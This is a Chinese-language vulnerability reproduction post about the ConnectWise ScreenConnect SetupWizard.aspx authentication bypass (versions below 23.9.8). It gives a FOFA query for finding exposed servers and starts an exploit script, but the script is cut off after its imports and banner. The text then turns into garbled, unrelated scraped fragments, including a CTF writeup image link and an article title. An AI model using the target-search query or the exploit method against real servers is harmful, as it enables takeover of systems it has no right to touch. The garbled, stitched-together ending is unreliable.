0x01 產品簡介
ConnectWise ScreenConnect ,是一款自托管的遠程桌面軟件應用,該款軟件允許用戶自行托管,可以在自己的服務器、個人電腦、虛擬機或虛擬專用服務器上運行。
0x02 漏洞概述
ConnectWise ScreenConnect低于23.9.8 版本的產品中,SetupWizard.aspx接口處存在身份驗證漏洞,未經授權攻擊者可以利用此漏洞注冊賬戶,并登陸到產品后臺進行一系列操作。而且可以通過 ScreenConnect 的原有功能進行命令執行,可導致服務器被接管的情況。
0x03 影響范圍
ScreenConnect < 23.9.8
0x04 復現環境
FOFA:
title="ScreenConnect Remote Support Software" || banner="ScreenConnect" || header="ScreenConnect"
0x05 漏洞復現
利用腳本
import requests
import re
import argparsebanner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \
![[newstarctf2023] --RE wp](http://pic.xiahunao.cn/[newstarctf2023] --RE wp)
)
| 如何評估RAG系統)
)
)
》)
)
